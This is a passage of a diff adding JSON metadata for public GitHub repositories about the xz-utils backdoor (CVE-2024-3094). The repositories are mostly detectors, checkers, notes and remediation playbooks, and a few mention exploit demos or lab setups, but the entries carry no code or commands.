+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780214985,
+ "name": "XZ-Utils_CVE-2024-3094",
+ "full_name": "MrBUGLF\/XZ-Utils_CVE-2024-3094",
+ "owner": {
+ "login": "MrBUGLF",
+ "id": 20143351,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20143351?v=4",
+ "html_url": "https:\/\/github.com\/MrBUGLF"
+ },
+ "html_url": "https:\/\/github.com\/MrBUGLF\/XZ-Utils_CVE-2024-3094",
+ "description": "XZ-Utils工具库恶意后门植入漏洞(CVE-2024-3094)",
+ "fork": false,
+ "created_at": "2024-04-01T01:56:08Z",
+ "updated_at": "2024-04-01T01:59:16Z",
+ "pushed_at": "2024-04-01T02:03:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780222430,
+ "name": "cve-2024-3094-detect",
+ "full_name": "galacticquest\/cve-2024-3094-detect",
+ "owner": {
+ "login": "galacticquest",
+ "id": 162942423,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162942423?v=4",
+ "html_url": "https:\/\/github.com\/galacticquest"
+ },
+ "html_url": "https:\/\/github.com\/galacticquest\/cve-2024-3094-detect",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T02:25:33Z",
+ "updated_at": "2024-04-01T13:10:39Z",
+ "pushed_at": "2024-04-01T03:09:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780252942,
+ "name": "cve-2024-3094-detect-tool",
+ "full_name": "zgimszhd61\/cve-2024-3094-detect-tool",
+ "owner": {
+ "login": "zgimszhd61",
+ "id": 114722053,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114722053?v=4",
+ "html_url": "https:\/\/github.com\/zgimszhd61"
+ },
+ "html_url": "https:\/\/github.com\/zgimszhd61\/cve-2024-3094-detect-tool",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T04:28:24Z",
+ "updated_at": "2024-04-03T02:34:34Z",
+ "pushed_at": "2024-04-01T04:35:03Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 780339519,
+ "name": "CVE-2024-3094-info",
+ "full_name": "mightysai1997\/CVE-2024-3094-info",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2024-3094-info",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T09:05:47Z",
+ "updated_at": "2024-04-01T09:06:03Z",
+ "pushed_at": "2024-04-01T09:05:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780339753,
+ "name": "CVE-2024-3094",
+ "full_name": "mightysai1997\/CVE-2024-3094",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T09:06:25Z",
+ "updated_at": "2024-04-01T09:06:38Z",
+ "pushed_at": "2024-04-01T09:06:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780341040,
+ "name": "xz-backdoor-vulnerability",
+ "full_name": "mesutgungor\/xz-backdoor-vulnerability",
+ "owner": {
+ "login": "mesutgungor",
+ "id": 4573148,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4573148?v=4",
+ "html_url": "https:\/\/github.com\/mesutgungor"
+ },
+ "html_url": "https:\/\/github.com\/mesutgungor\/xz-backdoor-vulnerability",
+ "description": "CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-04-01T09:09:54Z",
+ "updated_at": "2024-04-01T09:18:11Z",
+ "pushed_at": "2024-04-01T09:18:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780415912,
+ "name": "CVE-2024-3094",
+ "full_name": "reuteras\/CVE-2024-3094",
+ "owner": {
+ "login": "reuteras",
+ "id": 449846,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/449846?v=4",
+ "html_url": "https:\/\/github.com\/reuteras"
+ },
+ "html_url": "https:\/\/github.com\/reuteras\/CVE-2024-3094",
+ "description": "Obsidian notes about CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-04-01T12:41:00Z",
+ "updated_at": "2024-05-15T20:20:03Z",
+ "pushed_at": "2024-05-05T08:53:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 780459560,
+ "name": "xzbot",
+ "full_name": "amlweems\/xzbot",
+ "owner": {
+ "login": "amlweems",
+ "id": 117625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117625?v=4",
+ "html_url": "https:\/\/github.com\/amlweems"
+ },
+ "html_url": "https:\/\/github.com\/amlweems\/xzbot",
+ "description": "notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)",
+ "fork": false,
+ "created_at": "2024-04-01T14:28:09Z",
+ "updated_at": "2024-06-26T02:54:30Z",
+ "pushed_at": "2024-04-03T04:58:50Z",
+ "stargazers_count": 3469,
+ "watchers_count": 3469,
+ "has_discussions": false,
+ "forks_count": 233,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 233,
+ "watchers": 3469,
+ "score": 0,
+ "subscribers_count": 40
+ },
+ {
+ "id": 780480213,
+ "name": "CVE-2024-3094",
+ "full_name": "gustavorobertux\/CVE-2024-3094",
+ "owner": {
+ "login": "gustavorobertux",
+ "id": 38466612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38466612?v=4",
+ "html_url": "https:\/\/github.com\/gustavorobertux"
+ },
+ "html_url": "https:\/\/github.com\/gustavorobertux\/CVE-2024-3094",
+ "description": "Checker - CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-04-01T15:15:16Z",
+ "updated_at": "2024-04-03T18:37:25Z",
+ "pushed_at": "2024-04-02T10:39:09Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780489939,
+ "name": "detectar_cve-2024-3094",
+ "full_name": "ackemed\/detectar_cve-2024-3094",
+ "owner": {
+ "login": "ackemed",
+ "id": 112708193,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112708193?v=4",
+ "html_url": "https:\/\/github.com\/ackemed"
+ },
+ "html_url": "https:\/\/github.com\/ackemed\/detectar_cve-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T15:36:58Z",
+ "updated_at": "2024-04-01T23:04:50Z",
+ "pushed_at": "2024-04-01T23:04:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780503272,
+ "name": "xz-cve-2024-3094",
+ "full_name": "0xlane\/xz-cve-2024-3094",
+ "owner": {
+ "login": "0xlane",
+ "id": 22788893,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22788893?v=4",
+ "html_url": "https:\/\/github.com\/0xlane"
+ },
+ "html_url": "https:\/\/github.com\/0xlane\/xz-cve-2024-3094",
+ "description": "XZ Backdoor Extract(Test on Ubuntu 23.10)",
+ "fork": false,
+ "created_at": "2024-04-01T16:08:50Z",
+ "updated_at": "2024-05-14T11:09:48Z",
+ "pushed_at": "2024-04-02T07:12:53Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-3094",
+ "xz",
+ "xz-utils"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 780517704,
+ "name": "CVE-2024-3094",
+ "full_name": "dah4k\/CVE-2024-3094",
+ "owner": {
+ "login": "dah4k",
+ "id": 84741290,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84741290?v=4",
+ "html_url": "https:\/\/github.com\/dah4k"
+ },
+ "html_url": "https:\/\/github.com\/dah4k\/CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T16:42:47Z",
+ "updated_at": "2024-04-01T16:43:31Z",
+ "pushed_at": "2024-04-01T18:17:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780691332,
+ "name": "revisaxzutils",
+ "full_name": "hackingetico21\/revisaxzutils",
+ "owner": {
+ "login": "hackingetico21",
+ "id": 86624859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86624859?v=4",
+ "html_url": "https:\/\/github.com\/hackingetico21"
+ },
+ "html_url": "https:\/\/github.com\/hackingetico21\/revisaxzutils",
+ "description": "Script en bash para revisar si tienes la vulnerabilidad CVE-2024-3094.",
+ "fork": false,
+ "created_at": "2024-04-02T01:22:04Z",
+ "updated_at": "2024-04-02T01:28:45Z",
+ "pushed_at": "2024-04-02T01:28:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780700554,
+ "name": "CVE-2024-3094-XZ-Backdoor-Detector",
+ "full_name": "devjanger\/CVE-2024-3094-XZ-Backdoor-Detector",
+ "owner": {
+ "login": "devjanger",
+ "id": 55939719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55939719?v=4",
+ "html_url": "https:\/\/github.com\/devjanger"
+ },
+ "html_url": "https:\/\/github.com\/devjanger\/CVE-2024-3094-XZ-Backdoor-Detector",
+ "description": "CVE-2024-3094 XZ Backdoor Detector",
+ "fork": false,
+ "created_at": "2024-04-02T01:56:29Z",
+ "updated_at": "2024-04-02T02:08:37Z",
+ "pushed_at": "2024-04-02T02:24:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780728046,
+ "name": "CVE-2024-3094",
+ "full_name": "ScrimForever\/CVE-2024-3094",
+ "owner": {
+ "login": "ScrimForever",
+ "id": 5040124,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5040124?v=4",
+ "html_url": "https:\/\/github.com\/ScrimForever"
+ },
+ "html_url": "https:\/\/github.com\/ScrimForever\/CVE-2024-3094",
+ "description": "Detectar CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-04-02T03:36:07Z",
+ "updated_at": "2024-04-02T20:58:00Z",
+ "pushed_at": "2024-04-02T03:38:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780837798,
+ "name": "CVE-2024-3094",
+ "full_name": "pentestfunctions\/CVE-2024-3094",
+ "owner": {
+ "login": "pentestfunctions",
+ "id": 144001335,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4",
+ "html_url": "https:\/\/github.com\/pentestfunctions"
+ },
+ "html_url": "https:\/\/github.com\/pentestfunctions\/CVE-2024-3094",
+ "description": "CVE-2024-3094 - Checker (fix for arch etc)",
+ "fork": false,
+ "created_at": "2024-04-02T08:55:50Z",
+ "updated_at": "2024-06-21T20:04:50Z",
+ "pushed_at": "2024-04-02T09:11:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 781132313,
+ "name": "xzk8s",
+ "full_name": "r0binak\/xzk8s",
+ "owner": {
+ "login": "r0binak",
+ "id": 80983900,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4",
+ "html_url": "https:\/\/github.com\/r0binak"
+ },
+ "html_url": "https:\/\/github.com\/r0binak\/xzk8s",
+ "description": "Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-04-02T20:07:14Z",
+ "updated_at": "2024-06-23T13:44:19Z",
+ "pushed_at": "2024-04-06T16:09:56Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-3094",
+ "exploit",
+ "k8s",
+ "xz-utils-backdoor"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 781135899,
+ "name": "xz-backdoor-links",
+ "full_name": "przemoc\/xz-backdoor-links",
+ "owner": {
+ "login": "przemoc",
+ "id": 142372,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142372?v=4",
+ "html_url": "https:\/\/github.com\/przemoc"
+ },
+ "html_url": "https:\/\/github.com\/przemoc\/xz-backdoor-links",
+ "description": "apocalypxze: xz backdoor (2024) AKA CVE-2024-3094 related links",
+ "fork": false,
+ "created_at": "2024-04-02T20:17:07Z",
+ "updated_at": "2024-06-11T12:37:58Z",
+ "pushed_at": "2024-04-20T14:28:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apocalypxze",
+ "cve-2024-3094",
+ "xz-utils-backdoor"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 781191272,
+ "name": "CVE-2024-3094",
+ "full_name": "CyberGuard-Foundation\/CVE-2024-3094",
+ "owner": {
+ "login": "CyberGuard-Foundation",
+ "id": 165851880,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165851880?v=4",
+ "html_url": "https:\/\/github.com\/CyberGuard-Foundation"
+ },
+ "html_url": "https:\/\/github.com\/CyberGuard-Foundation\/CVE-2024-3094",
+ "description": "Our current information about the CVE-2024-3094 backdoor.",
+ "fork": false,
+ "created_at": "2024-04-02T23:10:06Z",
+ "updated_at": "2024-04-02T23:10:07Z",
+ "pushed_at": "2024-04-03T20:05:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 781344373,
+ "name": "CVE-2024-3094-fix-exploits",
+ "full_name": "Security-Phoenix-demo\/CVE-2024-3094-fix-exploits",
+ "owner": {
+ "login": "Security-Phoenix-demo",
+ "id": 79762943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79762943?v=4",
+ "html_url": "https:\/\/github.com\/Security-Phoenix-demo"
+ },
+ "html_url": "https:\/\/github.com\/Security-Phoenix-demo\/CVE-2024-3094-fix-exploits",
+ "description": "Collection of Detection, Fix, and exploit for CVE-2024-3094 ",
+ "fork": false,
+ "created_at": "2024-04-03T07:51:49Z",
+ "updated_at": "2024-04-26T01:31:19Z",
+ "pushed_at": "2024-04-03T07:57:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 781419608,
+ "name": "CVE-2024-3094-backdoor-env-container",
+ "full_name": "MagpieRYL\/CVE-2024-3094-backdoor-env-container",
+ "owner": {
+ "login": "MagpieRYL",
+ "id": 33757317,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33757317?v=4",
+ "html_url": "https:\/\/github.com\/MagpieRYL"
+ },
+ "html_url": "https:\/\/github.com\/MagpieRYL\/CVE-2024-3094-backdoor-env-container",
+ "description": "This is a container environment running CVE-2024-3094 sshd backdoor instance, working with https:\/\/github.com\/amlweems\/xzbot project. IT IS NOT Docker, just implemented by chroot.",
+ "fork": false,
+ "created_at": "2024-04-03T10:50:47Z",
+ "updated_at": "2024-04-03T11:59:50Z",
+ "pushed_at": "2024-04-03T13:05:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781477807,
+ "name": "xz-backdoor-CVE-2024-3094-Check",
+ "full_name": "Bella-Bc\/xz-backdoor-CVE-2024-3094-Check",
+ "owner": {
+ "login": "Bella-Bc",
+ "id": 10534659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10534659?v=4",
+ "html_url": "https:\/\/github.com\/Bella-Bc"
+ },
+ "html_url": "https:\/\/github.com\/Bella-Bc\/xz-backdoor-CVE-2024-3094-Check",
+ "description": "Verify if your installed version of xz-utils is vulnerable to CVE-2024-3094 backdoor",
+ "fork": false,
+ "created_at": "2024-04-03T13:09:32Z",
+ "updated_at": "2024-04-16T17:57:55Z",
+ "pushed_at": "2024-04-03T14:02:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781642777,
+ "name": "CVE-2024-3094-Checker",
+ "full_name": "TheTorjanCaptain\/CVE-2024-3094-Checker",
+ "owner": {
+ "login": "TheTorjanCaptain",
+ "id": 109307319,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109307319?v=4",
+ "html_url": "https:\/\/github.com\/TheTorjanCaptain"
+ },
+ "html_url": "https:\/\/github.com\/TheTorjanCaptain\/CVE-2024-3094-Checker",
+ "description": "The repository consists of a checker file that confirms if your xz version and xz-utils package is vulnerable to CVE-2024-3094.",
+ "fork": false,
+ "created_at": "2024-04-03T19:10:43Z",
+ "updated_at": "2024-04-03T19:12:47Z",
+ "pushed_at": "2024-04-03T19:36:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781709179,
+ "name": "CVE-2024-3094-Checker",
+ "full_name": "iheb2b\/CVE-2024-3094-Checker",
+ "owner": {
+ "login": "iheb2b",
+ "id": 61081690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61081690?v=4",
+ "html_url": "https:\/\/github.com\/iheb2b"
+ },
+ "html_url": "https:\/\/github.com\/iheb2b\/CVE-2024-3094-Checker",
+ "description": "The CVE-2024-3094 Checker is a Bash tool for identifying if Linux systems are at risk from the CVE-2024-3094 flaw in XZ\/LZMA utilities. It checks XZ versions, SSHD's LZMA linkage, and scans for specific byte patterns, delivering results in a concise table format. ",
+ "fork": false,
+ "created_at": "2024-04-03T22:19:50Z",
+ "updated_at": "2024-04-03T22:20:53Z",
+ "pushed_at": "2024-04-06T22:15:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781846725,
+ "name": "cve-2024-3094",
+ "full_name": "felipecosta09\/cve-2024-3094",
+ "owner": {
+ "login": "felipecosta09",
+ "id": 33869171,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33869171?v=4",
+ "html_url": "https:\/\/github.com\/felipecosta09"
+ },
+ "html_url": "https:\/\/github.com\/felipecosta09\/cve-2024-3094",
+ "description": "A tutorial on how to detect the CVE 2024-3094",
+ "fork": false,
+ "created_at": "2024-04-04T06:40:56Z",
+ "updated_at": "2024-04-05T10:39:12Z",
+ "pushed_at": "2024-04-05T10:50:45Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "containers",
+ "containersecurity",
+ "cve20243094",
+ "trendmicro",
+ "visionone",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781963666,
+ "name": "liblzma-scan",
+ "full_name": "weltregie\/liblzma-scan",
+ "owner": {
+ "login": "weltregie",
+ "id": 1319341,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1319341?v=4",
+ "html_url": "https:\/\/github.com\/weltregie"
+ },
+ "html_url": "https:\/\/github.com\/weltregie\/liblzma-scan",
+ "description": "Scans liblzma from xu-utils for backdoor (CVE-2024-3094)",
+ "fork": false,
+ "created_at": "2024-04-04T11:29:41Z",
+ "updated_at": "2024-04-04T11:31:33Z",
+ "pushed_at": "2024-04-04T11:36:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 782016563,
+ "name": "ansible-CVE-2024-3094",
+ "full_name": "crfearnworks\/ansible-CVE-2024-3094",
+ "owner": {
+ "login": "crfearnworks",
+ "id": 128843549,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128843549?v=4",
+ "html_url": "https:\/\/github.com\/crfearnworks"
+ },
+ "html_url": "https:\/\/github.com\/crfearnworks\/ansible-CVE-2024-3094",
+ "description": "Ansible playbooks designed to check and remediate CVE-2024-3094 (XZ Backdoor)",
+ "fork": false,
+ "created_at": "2024-04-04T13:31:20Z",
+ "updated_at": "2024-04-05T21:44:53Z",
+ "pushed_at": "2024-04-04T18:46:34Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 782054881,
+ "name": "ansible-playbook-cve-2024-3094",
+ "full_name": "robertdebock\/ansible-playbook-cve-2024-3094",
+ "owner": {
+ "login": "robertdebock",
+ "id": 3830775,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3830775?v=4",
+ "html_url": "https:\/\/github.com\/robertdebock"
+ },
+ "html_url": "https:\/\/github.com\/robertdebock\/ansible-playbook-cve-2024-3094",
+ "description": "A small repo with a single playbook.",
+ "fork": false,
+ "created_at": "2024-04-04T14:52:09Z",
+ "updated_at": "2024-04-16T16:04:25Z",
+ "pushed_at": "2024-04-05T11:12:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 782282800,
+ "name": "ludus_xz_backdoor",
+ "full_name": "badsectorlabs\/ludus_xz_backdoor",
+ "owner": {
+ "login": "badsectorlabs",
+ "id": 43366550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43366550?v=4",
+ "html_url": "https:\/\/github.com\/badsectorlabs"
+ },
+ "html_url": "https:\/\/github.com\/badsectorlabs\/ludus_xz_backdoor",
+ "description": "An Ansible Role that installs the xz backdoor (CVE-2024-3094) on a Debian host and optionally installs the xzbot tool.",
+ "fork": false,
+ "created_at": "2024-04-05T01:44:26Z",
+ "updated_at": "2024-06-11T20:12:04Z",
+ "pushed_at": "2024-04-05T02:36:41Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 782827523,
+ "name": "xz-backdoor-scan",
+ "full_name": "Juul\/xz-backdoor-scan",
+ "owner": {
+ "login": "Juul",
+ "id": 122752,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122752?v=4",
+ "html_url": "https:\/\/github.com\/Juul"
+ },
+ "html_url": "https:\/\/github.com\/Juul\/xz-backdoor-scan",
+ "description": "Scan for files containing the signature from the `xz` backdoor (CVE-2024-3094)",
+ "fork": false,
+ "created_at": "2024-04-06T06:29:43Z",
+ "updated_at": "2024-04-06T06:30:17Z",
+ "pushed_at": "2024-04-07T05:37:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786174088,
+ "name": "Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-",
+ "full_name": "fevar54\/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-",
